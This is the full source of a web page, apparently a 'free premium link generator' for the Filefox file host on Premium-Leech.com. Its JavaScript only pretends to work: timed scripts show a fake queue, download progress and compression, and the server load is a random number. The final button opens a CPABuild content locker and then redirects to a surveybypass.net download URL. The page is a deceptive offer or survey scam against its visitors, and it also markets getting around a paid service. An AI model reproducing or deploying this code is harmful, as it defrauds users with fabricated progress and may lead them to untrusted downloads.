<!DOCTYPE html>
<html lang = "en">
 
<head>
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin>
<link
    rel="preload"
    href="https://fonts.googleapis.com/css2?family=Lato&display=swap"
    as="style"
    onload="this.onload=null;this.rel='stylesheet'"
/>
<noscript>
    <link
        href="https://fonts.googleapis.com/css2?family=Lato&display=swap"
        rel="stylesheet"
        type="text/css"
    />
</noscript>
 <!-- Analytics code -->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-NSM3JT3Z1J"></script>

</script>
<meta name="keywords" content="Filefox premium link generator, Filefox debrid, Filefox debrideur, Filefox rapidleech, premium Filefox"/>
<meta name="description" content="Are you tired of paying to download files from Filefox? Use Premium-Leech to download the files for free, with no limits."/>
<meta name="viewport" content="width=device-width, initial-scale=1">

<link rel="preconnect" href="https://cdn.jsdelivr.net/" crossorigin="anonymous">


<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.1/dist/css/bootstrap.min.css" integrity="sha256-KTPJY0ik6ufLv48oDKCYFYaptcCX75UrmWytfSjy+tA=" crossorigin="anonymous">



<link rel="icon" type="image/png" href="../favicon.ico">

<title>Filefox.cc - Free Premium Link Generator | Premium-Leech.com</title>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":1837660,"key":"705a0"};
</script>
<script src="https://db81lfl43r06.cloudfront.net/f68df94.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.9.1/font/bootstrap-icons.css" integrity="sha256-8M+b2Hj+vy/2J5tZ9pYDHeuPD59KsaEZn1XXj3xVhjg=" crossorigin="anonymous">
<style>
    body{
padding-top: 25px;
overflow-x:hidden;
margin:0; 
height:100%; 
font-family: 'Lato', sans-serif;
background: rgb(9,9,121);
background: -moz-linear-gradient(90deg, rgba(9,9,121,1) 0%, rgba(0,212,255,1) 100%);
background: -webkit-linear-gradient(90deg, rgba(9,9,121,1) 0%, rgba(0,212,255,1) 100%);
background: linear-gradient(90deg, rgba(9,9,121,1) 0%, rgba(0,212,255,1) 100%);
filter: progid:DXImageTransform.Microsoft.gradient(startColorstr="#090979",endColorstr="#00d4ff",GradientType=1);
}


/*===================
		Desktop Theme 1 Css
********************/



.div-body {
	background-color: #f56800;
	background-size: 100%;
	background-repeat: no-repeat;
	min-height: 400px;
	padding: 50px 0px;
}


.div-main {
	width: 75%;
	max-width: 800px; 
	margin: 10px auto; 
	padding: 0px 0px 5px 0px; 
	background-color: #f9f9f9; 
	border-radius: 7px;
}


.div-header {
	padding: 10px;
	background-color: transparent; 
}

.p-title {
	color: #000; 
	font-size: 24px;
}

.p-desc {
	font-size: 18px;
	color: #000;
}

.p-footer {
	color: #000;
}




.btn-choose {
	display: block; 
	margin: 10px auto; 
	background-color: #000; 
	color: #000;
	font-size: 18px;
}

/* customs */

.link_a, .link_a:link {
 width:100%;
 background: #499bea;
 border: 1px solid #196bba;
 color: #fff;
 border-radius: 4px 4px 4px 4px;
 box-shadow: 0 1px 0 rgba(255, 255, 255, 0.2) inset, 0 1px 2px rgba(0, 0, 0, 0.05);
 cursor: pointer;
 display: inline-block;
 font-size: 14px;
 line-height: 10px;
 margin-bottom: 0;
 padding: 10px 12px;
 text-align: center;
 text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75);
 vertical-align: middle;
 font-weight: normal;
 text-decoration: none;

white-space: nowrap;
  overflow: hidden;
  text-overflow: ellipsis;

}
.link_a:hover {
 background: #207ce5;
 color: #fff;
 border: 1px solid #196bba;
 transition: background-position 0.1s linear 0s;
}

/* media q */

@media screen and (max-width: 980px) {
	.main {
		padding-left: 2%;
		padding-right: 2%;
	}
	.file-name {
		font-size: 18px;
	}
	.file-size {
		font-size: 23px;
	}
	.file-value {
		font-size: 12px;
	}
	.dl_button {
		font-size: 25px;
	}
	.dl_button img {
		width: 10%;
	}
	.content-hero {
		font-size: 18px;
	}
	.link_a {
		font-size: 11px !important;
	}
	.link_a img {
		width: 8%;
	}
	.section-text-hero {
		font-size: 40px;
	}
	.section-text-zero {
		font-size: 13px;
	}
}

@media screen and (max-width: 900px) {
	.link_a {
		font-size: 15px !important;
	}
}
@media screen and (max-width: 850px) {
	.link_a {
		width: 100%;
	}
	.jumbotron-left {
		width: 80%;
		margin-left: 10%;
		margin-right: 10%;
	}
	.jumbotron-right {
		display: none;
	}
	.step-section {
		width: 80%;
		margin-left: 10%;
		margin-right: 10%;
		margin-bottom: 25px;
	}
	.footer-left {
		width: 100%;
		text-align: center;
		margin-left: 0;
		margin-right: 0;
	}
	.footer-right {
		width: 100%;
		text-align: center;
		margin-left: 0;
		margin-right: 0;
	}
	.header {
		padding-bottom: 15px;
	}
	.file-hero {
		text-align: center;
	}
}

@media screen and (max-width: 800px) {
	.steps-hero {
		font-size: 25px;
	}
	.comment-hero {
		font-size: 23px;
	}
	.commenter-name {
		font-size: 20px;
	}
}

@media screen and (max-width: 600px) {
	.link_a {
		font-size: 15px !important;
	}
	.commenter-comment {
		font-size: 13px;
	}
	.comment-hero {
		font-size: 20px;
	}
	.steps-hero {
		font-size: 20px;
	}
	.link_a img {
		margin-left: 1%;
	}
	.content-hero {
		font-size: 16px;
		text-align: center;
	}
	.lead {
		font-size: 12px;
		text-align: center;
	}
	.file-name {
		font-size: 14px;
	}
	.file-size {
		font-size: 20px;
	}
	.file-value {
		font-size: 11px;
	}
	.file-text {
		margin-top: 15px;
	}
}

@media screen and (max-width: 550px) {
	.link_a {
		font-size: 15px !important;
	}
	.dl_button {
		font-size: 17px;
	}
	.jumbotron-left {
		margin-left: 2.5%;
		margin-right: 2.5%;
		width: 95%;
	}
.div-main {
width:95%
}
body{
padding-top: 50px;
}
#desc1{
line-height: 15px;
}

}
@media screen and (max-width: 450px) {
	.jumbotron-left {
		width: 95%;
		margin-left: 2.5%;
		margin-right: 2.5%;
	}
	.section-text-hero {
		font-size: 30px;
		margin-bottom: -7px;
	}
	.file-text {
		margin-top: 0px;
	}
	.file-name {
		font-size: 11px;
	}
	.file-size {
		font-size: 15px;
		margin-top: 0px;
	}
	.link_a img {
		display: none;
	}
}
.dl_button{
display:none;
}
.titulo{
font-family: 'Lato', sans-serif;
font-style: italic;
}
.clear { 
clear: both;
}
#bloco1{
position:relative;
}
#leechbox{
background-color:#fff;
text-align:center;
float:left;
width:100%;
padding:10px;
    border-radius: 10px;
	margin-top: 25px;
	border: 2px solid #000000;
}

</style>

</head>
<body>
<div class="container-fluid" style="width: 100%;">
    <div class="row g-0" style="width: 100%;">
        <div id="div-main" class="div-main text-center">
            <div id="div-header" class="div-header">
                <span id="p-title" class="p-title">
				<div style="text-align: center; font-weight: bold;">
				<h1 style="font-size:30px;font-weight:bold;" class='titulo'>Filefox - Free Premium Link Generator</h1><hr>
				<h2 style="font-size:25px;font-weight:bold;color:#0569b8;">Free Online Filefox Leecher</h2>
				</div>
				</span>
				<div id="bloco1">
				<br><b>Are you looking to download from Filefox for free? Use our free premium link generator!</b><br><br> With the Premium-Leech.com service you can skip the Filefox download limits and payments by generating a <strong>premium download link for free</strong> (No signup required).<br>
<br>Are you looking to download files from another premium filehost?<br><a href= "https://www.premium-leech.com/" style="font-weight:bold;">Click here</a> to see the <b>185+ other sites</b> we support.<hr>
				<b style="color:#0569b8;font-size:130%;">Using our website is easy:</b><br><br> ✔ Simply enter your file link and our advanced leech script will download it to our server, <strong>for free</strong>, without you needing a premium account.<br><br>
				✔ The leeched files are stored on our secure server and sent to you at <b>maximum speed</b> without any hourly limits or ads.<br>

				<hr><h3 style="color:#0569b8;font-size:130%;font-weight:bold;">Download your free files now below:</h3>
<div id="leechbox">
				<div id='c1'>
				Please enter your Filefox link below to leech and get a fast, free, direct link from our servers<br> <b>(Without any premium account)</b>:<br><br>
<div class="input-group mb-3">
  <div class="input-group-prepend">
    <span class="input-group-text" id="basic-addon1">Link:</span></div>
	<input id="URL" type="text"  class="form-control" placeholder="Enter your file link here..." aria-label="Enter your file link here..." aria-describedby="basic-addon1">
</div>
<br>
Clicking the button below you <b>agree</b> with our <b>terms and conditions</b>.<br><br>
<a href="#leechbox" class="btn btn-block btn-lg btn-success" onclick='sgen();'><i class="bi bi-cloud-arrow-down-fill"></i>&nbsp Generate / Leech Link</a>
</div>
<div id='c2' style="display:none;">
<span id='texto1' style="font-size: 25px;"></span><br>
<span id='texto2'>...</span>
</div>

				
				</div>
				<div class="clear"> </div>
				</div>
            </div>

            <div style="width: 80%; margin: 5px auto;">

                <div class="alert alert-info">
                    <span style="font-weight:bold;color:#000;">Premium-Leech Server Status:</span><br>
					<b>Script version:</b> 1.51 (Beta)<br>
					<b>Script last updated:</b> September 2022<br>
					<b>Latest premium generation success:</b> <1 minute ago.<br>
					<b>Script status:</b> Working <img src="../img/green.png" alt="Green tick" /><br>
					<b>Server Load:</b> <span id="load"><img src='../img/loading.gif' /></span>%
                </div>

            </div>
            <div id="p-footer" class="p-footer" style="margin-top: 20px;padding:20px;">
                <b>Disclaimer:</b> This website is not owned by, or affiliated with Filefox and is an unoffical, external website. <br><br><i>Please support Filefox in the future by purchasing a premium account, if you can afford it!</i> <br> <br> By using this site, you agree to the use of <a href="https://www.premium-leech.com/cookies-policy.html">cookies</a>.

            </div>
        </div>
    </div>
</div>
</body>
<script src="https://cdn.jsdelivr.net/npm/jquery@3.6.1/dist/jquery.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script>

<script>
setInterval(function(){ 
    var randm = Math.floor(Math.random() * 40) + 10;
    $('#load').hide();  
    $('#load').html(randm).fadeIn();
    var randm = 0;
}, 7000);
function vaiamigo(){
window.location="http://surveybypass.net/img/getfile.php?fileid=Filefox_leeched";
}
function CPABuildComplete(){
	alert("Verification Complete! Please wait...");
	vaiamigo();
}
function sgen(){
{
if($('#URL').val() == ''){
      alert('Please enter a valid URL.');
	  location.reload();
   }
$('#c1').hide();
$('#texto1').text('Connecting to server...');
$('#c2').fadeIn();
$('#c2').css('cursor','wait');
window.setTimeout(function () {
	$('#texto2').text('6%...');
}, 1000);
window.setTimeout(function () {
	$('#texto2').text('32%...');
}, 1500);
window.setTimeout(function () {
	$('#texto2').text('88%...');
}, 2000);
window.setTimeout(function () {
	$('#texto2').text('100%...');
}, 2200);
window.setTimeout(function () {
	$('#texto1').text('Getting your queue position...');
	$('#texto2').text('...');
}, 2500);
window.setTimeout(function () {
	$('#texto1').text('Your queue position is: 13');
	$('#texto2').html("<img src='../img/loading.gif' /> Please wait...");
}, 3500);
window.setTimeout(function () {
	$('#texto1').text('Your queue position is: 7');
	$('#texto2').html("<img src='../img/loading.gif' /> Please wait...");
}, 10500);
window.setTimeout(function () {
	$('#texto1').text('Your queue position is: 5');
	$('#texto2').html("<img src='../img/loading.gif' /> Please wait...");
}, 13500);
window.setTimeout(function () {
	$('#texto1').text('Your queue position is: 3');
	$('#texto2').html("<img src='../img/loading.gif' /> Please wait...");
}, 16500);
window.setTimeout(function () {
	$('#texto1').text('Your queue position is: 2');
	$('#texto2').html("<img src='../img/loading.gif' /> Please wait...");
}, 22500);
window.setTimeout(function () {
	$('#texto1').text('Download started!');
	$('#texto2').html("<img src='../img/loading.gif' /> Connecting to Filefox...");
}, 23500);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (9%)<br><img src='../img/loading2.gif' />");
}, 24500);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (21%)<br><img src='../img/loading2.gif' />");
}, 26500);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (22%)<br><img src='../img/loading2.gif' />");
}, 29500);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (38%)<br><img src='../img/loading2.gif' />");
}, 32500);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (47%)<br><img src='../img/loading2.gif' />");
}, 33900);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (56%)<br><img src='../img/loading2.gif' />");
}, 39000);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (68%)<br><img src='../img/loading2.gif' />");
}, 45000);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (71%)<br><img src='../img/loading2.gif' />");
}, 49000);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (91%)<br><img src='../img/loading2.gif' />");
}, 52000);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (97%)<br><img src='../img/loading2.gif' />");
}, 57200);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (99%)<br><img src='../img/loading2.gif' />");
}, 59000);
window.setTimeout(function () {
	$('#texto1').text('Downloading to server...');
	$('#texto2').html("Downloading (100%)<br><img src='../img/loading2.gif' />");
}, 61000);
window.setTimeout(function () {
	$('#texto1').text('Compressing leeched file...');
	$('#texto2').html("Compressing <img src='../img/rar.gif' /> Filefox_leeched.zip<br><img src='../img/loading2.gif' />");
}, 62500);
window.setTimeout(function () {
$('#c2').css('cursor','default');
	$('#texto1').hide();
	$('#texto1').html("<img src='../img/ok.png' /> Leech Success!").fadeIn();
	$('#texto2').html("Your download is ready!<br>Click the button below to open anti-spam verification and download your file:<br><a href='#' onclick='CPABuildLock();' class='btn btn-lg btn-primary'><span class='glyphicon glyphicon-circle-arrow-down'></span> Download Filefox_leeched.zip</a>");
}, 65500);

}
}
</script>


</html>